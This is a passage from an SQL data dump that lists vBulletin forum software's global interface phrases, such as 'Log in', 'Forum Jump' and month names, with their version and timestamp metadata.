(35508, -1, 'a_closed_forum', 'global', 'A Closed Forum', 'vbulletin', '', 0, ''),
(35509, -1, 'accept', 'global', 'Accept', 'vbulletin', '', 0, ''),
(35510, -1, 'action', 'global', 'Action', 'vbulletin', '', 0, ''),
(35511, -1, 'active_members', 'global', 'Active Members', 'vbulletin', '', 0, ''),
(35512, -1, 'active_subscriptions', 'global', 'Active Subscriptions', 'vbulletin', '', 0, ''),
(35513, -1, 'add_new_folders', 'global', 'Add New Folders', 'vbulletin', '', 0, ''),
(35514, -1, 'add_subscription', 'global', 'Add Subscription', 'vbulletin', '', 0, ''),
(35515, -1, 'add_x_to_contacts', 'global', 'Add {1} to Your Contacts', 'vbulletin', 'vBulletin Solutions', 1196424861, '3.7.0 Beta 1'),
(35516, -1, 'admin', 'global', 'Admin', 'vbulletin', '', 0, ''),
(35517, -1, 'admin_control_panel', 'global', 'Admin Control Panel', 'vbulletin', '', 0, ''),
(35518, -1, 'admin_required_register', 'global', 'The administrator may have required you to register before you can view this page.', 'vbulletin', 'vBulletin Solutions', 1233227208, '3.8.2'),
(35519, -1, 'administrator_decided_x_quiet', 'global', 'The administrator has decided that {1} should be quiet for a while.', 'vbulletin', 'vBulletin Solutions', 1210166183, '3.7.1'),
(35520, -1, 'administrator_may_disabled_account', 'global', 'If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.', 'vbulletin', '', 0, ''),
(35521, -1, 'advanced_search', 'global', 'Advanced Search', 'vbulletin', '', 0, ''),
(35522, -1, 'age', 'global', 'Age', 'vbulletin', '', 0, ''),
(35523, -1, 'alert_board_off', 'global', 'Alert: The forums are currently turned off!', 'vbulletin', '', 0, ''),
(35524, -1, 'all_forums', 'global', 'All Forums', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35525, -1, 'all_times_are_gmt_x_time_now_is_y', 'global', 'All times are GMT{1}. The time now is {2} .', 'vbulletin', '', 0, ''),
(35526, -1, 'allow_bbcode', 'global', 'Allow BB Code', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35527, -1, 'allow_html', 'global', 'Allow HTML', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35528, -1, 'allow_img_code', 'global', 'Allow [IMG] Code', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35529, -1, 'allow_smilies', 'global', 'Allow Smilies', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35530, -1, 'announcement', 'global', 'Announcement', 'vbulletin', '', 0, ''),
(35531, -1, 'announcements', 'global', 'Announcements', 'vbulletin', '', 0, ''),
(35532, -1, 'announcements_in_forum', 'global', 'Announcements in Forum', 'vbulletin', '', 0, ''),
(35533, -1, 'april', 'global', 'April', 'vbulletin', '', 0, ''),
(35534, -1, 'archive', 'global', 'Archive', 'vbulletin', '', 0, ''),
(35535, -1, 'attachment', 'global', 'Attachment', 'vbulletin', '', 0, ''),
(35536, -1, 'attachment_statistics', 'global', 'Attachment Statistics', 'vbulletin', '', 0, ''),
(35537, -1, 'attachments', 'global', 'Attachments', 'vbulletin', '', 0, ''),
(35538, -1, 'august', 'global', 'August', 'vbulletin', '', 0, ''),
(35539, -1, 'bb_code_is_x', 'global', 'BB code is {2} ', 'vbulletin', 'vBulletin Solutions', 1206964936, '3.7.0 Release Candidate 2'),
(35540, -1, 'bbcode_allowed', 'global', 'BB Code Allowed ', 'vbulletin', 'vBulletin Solutions', 1203948828, '3.7.0 Beta 6'),
(35541, -1, 'bbcode_not_allowed', 'global', 'BB Code is not allowed', 'vbulletin', 'vBulletin Solutions', 1196765570, '3.7.0 Beta 1'),
(35542, -1, 'befriend_x', 'global', 'Befriend {1}', 'vbulletin', 'vBulletin Solutions', 1195037435, '3.7.0 Beta 1'),
(35543, -1, 'by_x', 'global', 'by {2} ', 'vbulletin', '', 0, ''),
(35544, -1, 'bytes', 'global', 'Bytes', 'vbulletin', '', 0, ''),
(35545, -1, 'calendar', 'global', 'Calendar', 'vbulletin', '', 0, ''),
(35546, -1, 'can_moderate_user_signatures', 'global', 'Can Moderate User Signatures', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35547, -1, 'cancel', 'global', 'Cancel', 'vbulletin', '', 0, ''),
(35548, -1, 'cancel_changes', 'global', 'Cancel Changes', 'vbulletin', 'vBulletin Solutions', 1218195940, '3.8.0 Alpha 1'),
(35549, -1, 'cant_identify_image', 'global', 'Can\'t identify the image? Click it to get a new one.', 'vbulletin', 'vBulletin Solutions', 1150305216, '3.6.0 Beta 3'),
(35550, -1, 'caps_lock_is_on', 'global', 'Caps Lock is on! \r\n \r\nHaving Caps Lock on may cause you to enter your password incorrectly. You should press Caps Lock to turn it off before entering your password.', 'vbulletin', 'vBulletin Solutions', 1155827057, '3.6.1'),
(35551, -1, 'check_uncheck_all', 'global', 'Check / Uncheck All', 'vbulletin', '', 0, ''),
(35552, -1, 'check_vulnerable_passwords', 'global', 'Check Vulnerable Passwords', 'vbulletin', 'vBulletin Solutions', 1219226217, '3.8.0 Alpha 1'),
(35553, -1, 'click_a_smilie_to_insert_it_into_your_message', 'global', 'Click a smilie to insert it into your message.', 'vbulletin', '', 0, ''),
(35554, -1, 'click_here_to_log_in', 'global', 'Click here to log in', 'vbulletin', '', 0, ''),
(35555, -1, 'click_if_browser_does_not_redirect', 'global', 'Click here if your browser does not automatically redirect you.', 'vbulletin', '', 0, ''),
(35556, -1, 'click_the_following_button', 'global', 'Click the following button to proceed.', 'vbulletin', 'vBulletin Solutions', 1144350180, '3.6.0 Beta 1'),
(35557, -1, 'close_this_window', 'global', 'Close this window', 'vbulletin', '', 0, ''),
(35558, -1, 'closed_thread', 'global', 'Closed Thread', 'vbulletin', '', 0, ''),
(35559, -1, 'code', 'global', 'Code', 'vbulletin', '', 0, ''),
(35560, -1, 'community', 'global', 'Community', 'vbulletin', 'vBulletin Solutions', 1218542172, '3.8.0 Alpha 1'),
(35561, -1, 'community_links', 'global', 'Community Links', 'vbulletin', 'vBulletin Solutions', 1218546048, '3.8.0 Alpha 1'),
(35562, -1, 'contact', 'global', 'Contact', 'vbulletin', '', 0, ''),
(35563, -1, 'contact_us', 'global', 'Contact Us', 'vbulletin', '', 0, ''),
(35564, -1, 'contacts', 'global', 'Contacts', 'vbulletin', 'vBulletin Solutions', 1196427469, '3.7.0 Beta 1'),
(35565, -1, 'contacts_and_friends', 'global', 'Contacts & Friends', 'vbulletin', 'vBulletin Solutions', 1196427317, '3.7.0 Beta 1'),
(35566, -1, 'contains_new_posts', 'global', 'Contains New Posts', 'vbulletin', '', 0, ''),
(35567, -1, 'contains_no_new_posts', 'global', 'Contains No New Posts', 'vbulletin', '', 0, ''),
(35568, -1, 'current_attachment_total_x', 'global', 'Current Attachment Total: {1}', 'vbulletin', '', 0, ''),
(35569, -1, 'current_attachments', 'global', 'Current Attachments', 'vbulletin', '', 0, ''),
(35570, -1, 'currently_active_users', 'global', 'Currently Active Users', 'vbulletin', '', 0, ''),
(35571, -1, 'custom_fields', 'global', 'Custom Fields', 'vbulletin', '', 0, ''),
(35572, -1, 'daily', 'global', 'Daily', 'vbulletin', '', 0, ''),
(35573, -1, 'daily_email_notification', 'global', 'Daily email notification', 'vbulletin', '', 0, ''),
(35574, -1, 'daily_updates_by_email', 'global', 'Daily updates by email', 'vbulletin', '', 0, ''),
(35575, -1, 'date', 'global', 'Date', 'vbulletin', '', 0, ''),
(35576, -1, 'day', 'global', 'Day', 'vbulletin', '', 0, ''),
(35577, -1, 'days', 'global', 'Days', 'vbulletin', '', 0, ''),
(35578, -1, 'december', 'global', 'December', 'vbulletin', '', 0, ''),
(35579, -1, 'decrease_size', 'global', 'Decrease Size', 'vbulletin', '', 0, ''),
(35580, -1, 'default', 'global', 'Default', 'vbulletin', '', 0, ''),
(35581, -1, 'delete', 'global', 'Delete', 'vbulletin', '', 0, ''),
(35582, -1, 'delete_posts', 'global', 'Delete Posts', 'vbulletin', '', 0, ''),
(35583, -1, 'delete_selected', 'global', 'Delete Selected', 'vbulletin', '', 0, ''),
(35584, -1, 'delete_subscription', 'global', 'Delete Subscription', 'vbulletin', '', 0, ''),
(35585, -1, 'delete_thread', 'global', 'Delete Thread', 'vbulletin', '', 0, ''),
(35586, -1, 'delete_user_note', 'global', 'Delete User Note', 'vbulletin', '', 0, ''),
(35587, -1, 'deny', 'global', 'Deny', 'vbulletin', '', 0, ''),
(35588, -1, 'destination_forum', 'global', 'Destination Forum', 'vbulletin', '', 0, ''),
(35589, -1, 'disabled', 'global', 'Disabled', 'vbulletin', 'vBulletin Solutions', 1192488949, '3.7.0 Beta 1'),
(35590, -1, 'discussion_by_x_for_y_undeleted', 'global', 'Discussion by {1} for \'{2}\' Undeleted', 'vbulletin', 'vBulletin Solutions', 1222079939, '3.8.0 Alpha 2'),
(35591, -1, 'discussion_thread_created_x_y', 'global', 'A discussion thread has been created at {1}/showthread.php?t={2}', 'vbulletin', 'vBulletin Solutions', 1196372524, '3.7.0 Beta 1'),
(35592, -1, 'dismiss', 'global', 'Dismiss', 'vbulletin', 'vBulletin Solutions', 1218633405, '3.8.0 Alpha 1'),
(35593, -1, 'display_options', 'global', 'Display Options', 'vbulletin', '', 0, ''),
(35594, -1, 'do_authorizations', 'global', 'Do Authorizations', 'vbulletin', '', 0, ''),
(35595, -1, 'done', 'global', 'Done', 'vbulletin', '', 0, ''),
(35596, -1, 'doubleclick_forum_markread', 'global', 'Double-click this icon to mark this forum and its contents as read', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35597, -1, 'edit', 'global', 'Edit', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35598, -1, 'edit_avatar', 'global', 'Edit Avatar', 'vbulletin', '', 0, ''),
(35599, -1, 'edit_folders', 'global', 'Edit Folders', 'vbulletin', '', 0, ''),
(35600, -1, 'edit_options', 'global', 'Edit Options', 'vbulletin', '', 0, ''),
(35601, -1, 'edit_permissions', 'global', 'Edit Permissions', 'vbulletin', 'vBulletin Solutions', 1213891590, '3.8.0 Alpha 1'),
(35602, -1, 'edit_poll', 'global', 'Edit Poll', 'vbulletin', '', 0, ''),
(35603, -1, 'edit_post', 'global', 'Edit Post', 'vbulletin', '', 0, ''),
(35604, -1, 'edit_profile_picture', 'global', 'Edit Profile Picture', 'vbulletin', '', 0, ''),
(35605, -1, 'edit_signature', 'global', 'Edit Signature', 'vbulletin', '', 0, ''),
(35606, -1, 'edit_thread', 'global', 'Edit Thread', 'vbulletin', '', 0, ''),
(35607, -1, 'edit_user_note', 'global', 'Edit User Note', 'vbulletin', '', 0, ''),
(35608, -1, 'edit_your_details', 'global', 'Edit Your Details', 'vbulletin', 'vBulletin Solutions', 1197902885, '3.7.0 Beta 2'),
(35609, -1, 'email', 'global', 'Email', 'vbulletin', '', 0, ''),
(35610, -1, 'email_address', 'global', 'Email Address', 'vbulletin', '', 0, ''),
(35611, -1, 'emailing', 'global', 'Emailing', 'vbulletin', '', 0, ''),
(35612, -1, 'end_date', 'global', 'End Date', 'vbulletin', 'vBulletin Solutions', 1149257916, '3.6.0 Beta 1'),
(35613, -1, 'enter_password_for_account', 'global', 'Please enter a password for your user account. Note that passwords are case-sensitive.', 'vbulletin', '', 0, ''),
(35614, -1, 'enter_username_to_login_or_register', 'global', 'Enter your username and password in the boxes provided to login, or click the \'register\' button to create a profile for yourself.', 'vbulletin', '', 0, ''),
(35615, -1, 'errors', 'global', 'Errors', 'vbulletin', 'vBulletin Solutions', 1190904785, '3.7.0 Beta 1'),
(35616, -1, 'errors_occured_when_submitted', 'global', 'The following errors occurred with your submission', 'vbulletin', 'vBulletin Solutions', 1191936212, '3.7.0 Beta 1'),
(35617, -1, 'event', 'global', 'Event', 'vbulletin', '', 0, ''),
(35618, -1, 'event_reminders', 'global', 'Event Reminders', 'vbulletin', '', 0, ''),
(35619, -1, 'export', 'global', 'Export', 'vbulletin', '', 0, ''),
(35620, -1, 'faq', 'global', 'FAQ', 'vbulletin', '', 0, ''),
(35621, -1, 'february', 'global', 'February', 'vbulletin', '', 0, ''),
(35622, -1, 'find_all_posts_by_x', 'global', 'Find all posts by {1}', 'vbulletin', '', 0, ''),
(35623, -1, 'find_posts_by_user', 'global', 'Find Posts by User', 'vbulletin', '', 0, ''),
(35624, -1, 'first', 'global', 'First', 'vbulletin', '', 0, ''),
(35625, -1, 'first_page', 'global', 'First Page', 'vbulletin', '', 0, ''),
(35626, -1, 'first_picture_short', 'global', 'First', 'vbulletin', 'vBulletin Solutions', 1247671616, '3.8.3'),
(35627, -1, 'first_visit_message', 'global', 'If this is your first visit, be sure to check out the FAQ by clicking the link above.\r\nYou may have to register before you can post: click the register link above to proceed.\r\nTo start viewing messages, select the forum that you want to visit from the selection below.', 'vbulletin', 'vBulletin Solutions', 1233227197, '3.8.2'),
(35628, -1, 'folder', 'global', 'Folder', 'vbulletin', '', 0, ''),
(35629, -1, 'folder_controls', 'global', 'Folder Controls', 'vbulletin', '', 0, ''),
(35630, -1, 'folder_is_currently_empty', 'global', 'This folder is currently empty.', 'vbulletin', '', 0, ''),
(35631, -1, 'folder_name', 'global', 'Folder Name', 'vbulletin', '', 0, ''),
(35632, -1, 'folders', 'global', 'Folders', 'vbulletin', '', 0, ''),
(35633, -1, 'forgotten_password_request_email', 'global', 'If you have forgotten your username or password, you can request to have your username emailed to you and to reset your password. When you fill in your registered email address, you will be sent instructions on how to reset your password.', 'vbulletin', '', 0, ''),
(35634, -1, 'forgotten_your_password', 'global', 'Forgotten Your Password?', 'vbulletin', '', 0, ''),
(35635, -1, 'forum', 'global', 'Forum', 'vbulletin', '', 0, ''),
(35636, -1, 'forum_contains_new_posts', 'global', 'Forum Contains New Posts', 'vbulletin', '', 0, ''),
(35637, -1, 'forum_contains_no_new_posts', 'global', 'Forum Contains No New Posts', 'vbulletin', '', 0, ''),
(35638, -1, 'forum_is_closed_for_posting', 'global', 'Forum is Closed for Posting', 'vbulletin', '', 0, ''),
(35639, -1, 'forum_jump', 'global', 'Forum Jump', 'vbulletin', '', 0, ''),
(35640, -1, 'forum_rules_link', 'global', 'Forum Rules ', 'vbulletin', 'vBulletin Solutions', 1220350190, '3.8.0 Alpha 1'),
(35641, -1, 'forums', 'global', 'Forums', 'vbulletin', '', 0, ''),
(35642, -1, 'forums_home', 'global', 'Forums Home', 'vbulletin', '', 0, ''),
(35643, -1, 'friday', 'global', 'Friday', 'vbulletin', '', 0, ''),
(35644, -1, 'friend', 'global', 'Friend', 'vbulletin', 'vBulletin Solutions', 1195753900, '3.7.0 Beta 1'),
(35645, -1, 'gigabytes', 'global', 'GB', 'vbulletin', '', 0, ''),
(35646, -1, 'global_announcement', 'global', 'Global Announcement', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35647, -1, 'go', 'global', 'Go', 'vbulletin', '', 0, ''),
(35648, -1, 'go_back', 'global', 'Go Back', 'vbulletin', '', 0, ''),
(35649, -1, 'go_first_unread_in_thread_x', 'global', 'Go to first unread post in thread \'{1}\'', 'vbulletin', '', 0, ''),
(35650, -1, 'go_to_first_new_post', 'global', 'Go to first new post', 'vbulletin', '', 0, ''),
(35651, -1, 'go_to_last_post', 'global', 'Go to last post', 'vbulletin', '', 0, ''),
(35652, -1, 'go_to_page', 'global', 'Go to Page...', 'vbulletin', '', 0, ''),
(35653, -1, 'go_x', 'global', 'Go ({1})', 'vbulletin', '', 0, ''),
(35654, -1, 'group_messages_awaiting_approval', 'global', 'Unapproved Group Messages', 'vbulletin', 'vBulletin Solutions', 1212410901, '3.8.0 Alpha 1'),
(35655, -1, 'guest', 'global', 'Guest', 'vbulletin', '', 0, ''),
(35656, -1, 'have_new_pm_popup_x_y', 'global', 'You have a new private message.\\n\\nSender: {1}\\nTitle: \'{2}\'\\n\\nClick OK to view it, or cancel to hide this prompt.', 'vbulletin', 'vBulletin Solutions', 1202140573, '3.7.0 Beta 5'),
(35657, -1, 'have_x_posts_in_thread_last_y', 'global', 'You have {1} post(s) in this thread, last {2}', 'vbulletin', '', 0, ''),
(35658, -1, 'hide_thumbnails', 'global', 'Hide Thumbnails', 'vbulletin', '', 0, ''),
(35659, -1, 'hours', 'global', 'Hours', 'vbulletin', 'vBulletin Solutions', 1155836709, '3.6.1'),
(35660, -1, 'html_code', 'global', 'HTML Code', 'vbulletin', '', 0, ''),
(35661, -1, 'html_code_is_x', 'global', 'HTML code is {1} ', 'vbulletin', '', 0, ''),
(35662, -1, 'hybrid', 'global', 'Hybrid', 'vbulletin', '', 0, ''),
(35663, -1, 'ignore', 'global', 'Ignore', 'vbulletin', '', 0, ''),
(35664, -1, 'image_verification', 'global', 'Image Verification', 'vbulletin', 'vBulletin Solutions', 1144957466, '3.6.0 Beta 1'),
(35665, -1, 'img_code_is_x', 'global', '[IMG] code is {2} ', 'vbulletin', '', 0, ''),
(35666, -1, 'in_progress', 'global', 'In Progress', 'vbulletin', '', 0, ''),
(35667, -1, 'inbox', 'global', 'Inbox', 'vbulletin', '', 0, ''),
(35668, -1, 'incoming_friend_requests', 'global', 'Incoming Friend Requests', 'vbulletin', 'vBulletin Solutions', 1197374250, '3.7.0 Beta 1'),
(35669, -1, 'increase_size', 'global', 'Increase Size', 'vbulletin', '', 0, ''),
(35670, -1, 'info', 'global', 'Info', 'vbulletin', '', 0, ''),
(35671, -1, 'infractions', 'global', 'Infractions', 'vbulletin', 'vBulletin Solutions', 1150416261, '3.6.0 Beta 3'),
(35672, -1, 'instant_email_notification', 'global', 'Instant email notification', 'vbulletin', '', 0, ''),
(35673, -1, 'instant_messaging', 'global', 'Instant Messaging', 'vbulletin', '', 0, ''),
(35674, -1, 'instant_notification_by_email', 'global', 'Instant notification by email', 'vbulletin', '', 0, ''),
(35675, -1, 'invitations_to_join_social_groups', 'global', 'Social Group Invitations', 'vbulletin', 'vBulletin Solutions', 1212410927, '3.8.0 Alpha 1'),
(35676, -1, 'ip_address', 'global', 'IP Address', 'vbulletin', '', 0, ''),
(35677, -1, 'january', 'global', 'January', 'vbulletin', '', 0, ''),
(35678, -1, 'join_date', 'global', 'Join Date', 'vbulletin', '', 0, ''),
(35679, -1, 'join_request', 'global', 'Join Request', 'vbulletin', '', 0, ''),
(35680, -1, 'join_requests', 'global', 'Join Requests', 'vbulletin', '', 0, ''),
(35681, -1, 'july', 'global', 'July', 'vbulletin', '', 0, ''),
(35682, -1, 'jump_to_folder', 'global', 'Jump to Folder', 'vbulletin', '', 0, ''),
(35683, -1, 'june', 'global', 'June', 'vbulletin', '', 0, ''),
(35684, -1, 'kilobytes', 'global', 'KB', 'vbulletin', '', 0, ''),
(35685, -1, 'last', 'global', 'Last', 'vbulletin', '', 0, ''),
(35686, -1, 'last_activity', 'global', 'Last Activity', 'vbulletin', '', 0, ''),
(35687, -1, 'last_online', 'global', 'Last Online', 'vbulletin', '', 0, ''),
(35688, -1, 'last_page', 'global', 'Last Page', 'vbulletin', '', 0, ''),
(35689, -1, 'last_picture_short', 'global', 'Last', 'vbulletin', 'vBulletin Solutions', 1247671956, '3.8.3'),
(35690, -1, 'last_post', 'global', 'Last Post', 'vbulletin', '', 0, ''),
(35691, -1, 'last_visited_x_at_y', 'global', 'You last visited: {1} at {2} ', 'vbulletin', '', 0, ''),
(35692, -1, 'lightbox_first', 'global', 'First', 'vbulletin', 'vBulletin Solutions', 1247671588, '3.8.3'),
(35693, -1, 'lightbox_last', 'global', 'Last', 'vbulletin', 'vBulletin Solutions', 1247671934, '3.8.3'),
(35694, -1, 'lightbox_next', 'global', 'Next', 'vbulletin', 'vBulletin Solutions', 1247672196, '3.8.3'),
(35695, -1, 'lightbox_previous', 'global', 'Previous', 'vbulletin', 'vBulletin Solutions', 1247672569, '3.8.3'),
(35696, -1, 'list_messages', 'global', 'List Messages', 'vbulletin', '', 0, ''),
(35697, -1, 'list_subscriptions', 'global', 'List Subscriptions', 'vbulletin', '', 0, ''),
(35698, -1, 'location_perm', 'global', 'Location', 'vbulletin', '', 0, ''),
(35699, -1, 'log_in', 'global', 'Log in', 'vbulletin', '', 0, ''),
(35700, -1, 'log_out', 'global', 'Log Out', 'vbulletin', '', 0, ''),
(35701, -1, 'log_out_x', 'global', 'Log Out {1}', 'vbulletin', '', 0, ''),
(35702, -1, 'logged_in_as_x', 'global', 'Logged in as {2} ', 'vbulletin', '', 0, ''),
(35703, -1, 'lost_password_recovery_form', 'global', 'Lost Password Recovery Form', 'vbulletin', '', 0, ''),
(35704, -1, 'manage', 'global', 'Manage', 'vbulletin', '', 0, ''),
(35705, -1, 'manage_attachments', 'global', 'Manage Attachments', 'vbulletin', '', 0, ''),
(35706, -1, 'march', 'global', 'March', 'vbulletin', '', 0, ''),
(35707, -1, 'mark_forums_read', 'global', 'Mark Forums Read', 'vbulletin', '', 0, ''),
(35708, -1, 'mark_this_discussion_read', 'global', 'Mark This Discussion Read', 'vbulletin', 'vBulletin Solutions', 1213633526, '3.7.1'),
(35709, -1, 'mark_this_group_read', 'global', 'Mark This Group Read', 'vbulletin', 'vBulletin Solutions', 1213615172, '3.7.1'),
(35710, -1, 'maximum_allowed_messages_x', 'global', 'Maximum allowed stored messages: {1}', 'vbulletin', '', 0, ''),
(35711, -1, 'maximum_attachment_storage_x', 'global', 'Maximum Attachment Storage: {1}', 'vbulletin', '', 0, ''),
(35712, -1, 'may', 'global', 'May', 'vbulletin', '', 0, ''),
(35713, -1, 'may_choose_icon_for_message', 'global', 'You may choose an icon for your message from the following list', 'vbulletin', '', 0, ''),
(35714, -1, 'may_not_have_sufficient_privileges', 'global', 'You may not have sufficient privileges to access this page. Are you trying to edit someone else\'s post, access administrative features or some other privileged system?', 'vbulletin', '', 0, ''),
(35715, -1, 'megabytes', 'global', 'MB', 'vbulletin', '', 0, ''),
(35716, -1, 'members', 'global', 'Members', 'vbulletin', '', 0, ''),
(35717, -1, 'members_list', 'global', 'Members List', 'vbulletin', '', 0, ''),
(35718, -1, 'members_picture_albums', 'global', 'Member\'s Picture Albums', 'vbulletin', 'vBulletin Solutions', 1216916667, '3.8.0 Alpha 1'),
(35719, -1, 'message', 'global', 'Message', 'vbulletin', '', 0, ''),
(35720, -1, 'message_deleted_by_x', 'global', 'This message has been deleted by {2} .', 'vbulletin', 'vBulletin Solutions', 1144777399, '3.6.0 Beta 1'),
(35721, -1, 'message_hidden_x_on_ignore_list', 'global', 'This message is hidden because {1} is on your ignore list .', 'vbulletin', 'vBulletin Solutions', 1202913478, '3.7.0 Beta 5'),
(35722, -1, 'messages', 'global', 'Messages', 'vbulletin', '', 0, ''),
(35723, -1, 'miscellaneous', 'global', 'Miscellaneous', 'vbulletin', '', 0, ''),
(35724, -1, 'miscellaneous_options', 'global', 'Miscellaneous Options', 'vbulletin', '', 0, ''),
(35725, -1, 'mod', 'global', 'Mod', 'vbulletin', '', 0, ''),
(35726, -1, 'moderator', 'global', 'Moderator', 'vbulletin', '', 0, ''),
(35727, -1, 'moderator_control_panel', 'global', 'Moderator Control Panel', 'vbulletin', '', 0, ''),
(35728, -1, 'moderators', 'global', 'Moderators', 'vbulletin', '', 0, ''),
(35729, -1, 'monday', 'global', 'Monday', 'vbulletin', '', 0, ''),
(35730, -1, 'month', 'global', 'Month', 'vbulletin', '', 0, ''),
(35731, -1, 'monthly', 'global', 'Monthly', 'vbulletin', '', 0, ''),
(35732, -1, 'months', 'global', 'Months', 'vbulletin', '', 0, ''),
(35733, -1, 'more_than_x_replies_or_y_views', 'global', 'More than {1} replies or {2} views', 'vbulletin', '', 0, ''),
(35734, -1, 'most_users_ever_online_was_x_y_at_z', 'global', 'Most users ever online was {1}, {2} at {3}.', 'vbulletin', '', 0, ''),
(35735, -1, 'move_delete_subscriptions', 'global', 'Move / Delete Subscriptions', 'vbulletin', '', 0, ''),
(35736, -1, 'move_items', 'global', 'Move Items', 'vbulletin', '', 0, ''),
(35737, -1, 'move_subscribed_threads', 'global', 'Move Subscribed Threads', 'vbulletin', '', 0, ''),
(35738, -1, 'move_to_folder', 'global', 'Move to folder', 'vbulletin', '', 0, ''),
(35739, -1, 'move_x_items_from_y', 'global', 'Move {1} items from \'{2}\'', 'vbulletin', '', 0, ''),
(35740, -1, 'moved_thread_prefix', 'global', 'Moved: ', 'vbulletin', '', 0, ''),
(35741, -1, 'multipage_thread', 'global', 'Multi-page thread', 'vbulletin', '', 0, ''),
(35742, -1, 'multiple_choice_poll', 'global', 'Multiple Choice Poll.', 'vbulletin', '', 0, ''),
(35743, -1, 'n_a', 'global', 'N/A', 'vbulletin', '', 0, ''),
(35744, -1, 'networking', 'global', 'Networking', 'vbulletin', 'vBulletin Solutions', 1201009850, '3.7.0 Beta 5'),
(35745, -1, 'never', 'global', 'Never', 'vbulletin', '', 0, ''),
(35747, -1, 'new_posts', 'global', 'New posts', 'vbulletin', 'vBulletin Solutions', 1216989273, '3.8.0 Alpha 1'),
(35748, -1, 'new_posts_nav', 'global', 'New Posts', 'vbulletin', 'vBulletin Solutions', 1216989282, '3.8.0 Alpha 1'),
(35749, -1, 'new_user_note', 'global', 'New User Note', 'vbulletin', '', 0, ''),
(35750, -1, 'next', 'global', 'Next', 'vbulletin', '', 0, ''),
(35751, -1, 'next_page', 'global', 'Next Page', 'vbulletin', '', 0, ''),
(35752, -1, 'next_picture_short', 'global', 'Next', 'vbulletin', 'vBulletin Solutions', 1265284692, '3.8.5'),
(35753, -1, 'no', 'global', 'No', 'vbulletin', '', 0, ''),
(35754, -1, 'no_email_notification', 'global', 'No email notification', 'vbulletin', '', 0, ''),
(35755, -1, 'no_icon', 'global', 'No icon', 'vbulletin', '', 0, ''),
(35756, -1, 'no_new_posts', 'global', 'No new posts', 'vbulletin', '', 0, ''),
(35757, -1, 'no_signatures_awaiting_moderation', 'global', 'No Signatures Awaiting Moderation', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35758, -1, 'no_users_selected', 'global', 'No users selected!', 'vbulletin', '', 0, ''),
(35759, -1, 'none', 'global', 'None', 'vbulletin', '', 0, ''),
(35760, -1, 'not', 'global', 'not', 'vbulletin', '', 0, ''),
(35761, -1, 'not_logged_in_fill_in_form', 'global', 'You are not logged in. Fill in the form at the bottom of this page and try again.', 'vbulletin', '', 0, ''),
(35762, -1, 'not_logged_no_permission', 'global', 'You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:', 'vbulletin', '', 0, ''),
(35763, -1, 'notices', 'global', 'Notices', 'vbulletin', 'vBulletin Solutions', 1189781133, '3.6.8'),
(35764, -1, 'notification', 'global', 'Notification', 'vbulletin', '', 0, ''),
(35765, -1, 'notification_type', 'global', 'Notification Type', 'vbulletin', '', 0, ''),
(35766, -1, 'november', 'global', 'November', 'vbulletin', '', 0, ''),
(35767, -1, 'number_of_replies', 'global', 'Number of Replies', 'vbulletin', '', 0, ''),
(35768, -1, 'number_of_views', 'global', 'Number of Views', 'vbulletin', '', 0, ''),
(35769, -1, 'numeric_value', 'global', '{1}', 'vbulletin', 'vBulletin Solutions', 1211880882, '3.7.1'),
(35770, -1, 'numeric_value_emphasized', 'global', '{1} ', 'vbulletin', 'vBulletin Solutions', 1211880898, '3.7.1'),
(35771, -1, 'october', 'global', 'October', 'vbulletin', '', 0, ''),
(35772, -1, 'off', 'global', 'Off', 'vbulletin', '', 0, ''),
(35773, -1, 'offline', 'global', 'Offline', 'vbulletin', '', 0, ''),
(35774, -1, 'okay', 'global', 'Okay', 'vbulletin', '', 0, ''),
(35775, -1, 'old', 'global', 'Old', 'vbulletin', '', 0, ''),
(35776, -1, 'older', 'global', 'Older', 'vbulletin', 'vBulletin Solutions', 1152610994, '3.6.0 Release Candidate 2'),
(35777, -1, 'on', 'global', 'On', 'vbulletin', '', 0, ''),
(35778, -1, 'online', 'global', 'Online', 'vbulletin', '', 0, ''),
(35779, -1, 'only_used_to_report', 'global', 'Note : This is ONLY to be used to report spam, advertising messages, and problematic (harassment, fighting, or rude) posts.', 'vbulletin', 'vBulletin Solutions', 1203421356, '3.7.0 Beta 6'),
(35780, -1, 'open_contacts', 'global', 'Open Contacts Popup', 'vbulletin', 'vBulletin Solutions', 1196433782, '3.7.0 Beta 1'),
(35781, -1, 'open_message_in_new_window', 'global', 'Open the message in a new window?\\n\\n(Press cancel to open in the current window.)', 'vbulletin', '', 0, ''),
(35782, -1, 'option', 'global', 'Option', 'vbulletin', '', 0, ''),
(35783, -1, 'option_2_upload_image_from_computer', 'global', 'Option 2 - Upload Image From Your Computer', 'vbulletin', 'vBulletin Solutions', 1158602799, '3.6.2'),
(35784, -1, 'optional', 'global', 'Optional', 'vbulletin', '', 0, ''),
(35785, -1, 'options', 'global', 'Options', 'vbulletin', '', 0, ''),
(35786, -1, 'or', 'global', 'or', 'vbulletin', '', 0, ''),
(35787, -1, 'originally_posted_by_x', 'global', 'Originally Posted by {1} ', 'vbulletin', '', 0, ''),
(35788, -1, 'page_x', 'global', 'Page {1}', 'vbulletin', '', 0, ''),
(35789, -1, 'page_x_of_y', 'global', 'Page {1} of {2}', 'vbulletin', '', 0, ''),
(35790, -1, 'pagenav_first', 'global', 'First', 'vbulletin', 'vBulletin Solutions', 1247671603, '3.8.3'),
(35791, -1, 'pagenav_last', 'global', 'Last', 'vbulletin', 'vBulletin Solutions', 1247671946, '3.8.3'),
(35792, -1, 'pages', 'global', 'Pages', 'vbulletin', '', 0, ''),
(35793, -1, 'paid_subscriptions', 'global', 'Paid Subscriptions', 'vbulletin', '', 0, ''),
(35794, -1, 'password', 'global', 'Password', 'vbulletin', '', 0, ''),
(35795, -1, 'per_page', 'global', 'Per Page', 'vbulletin', '', 0, ''),
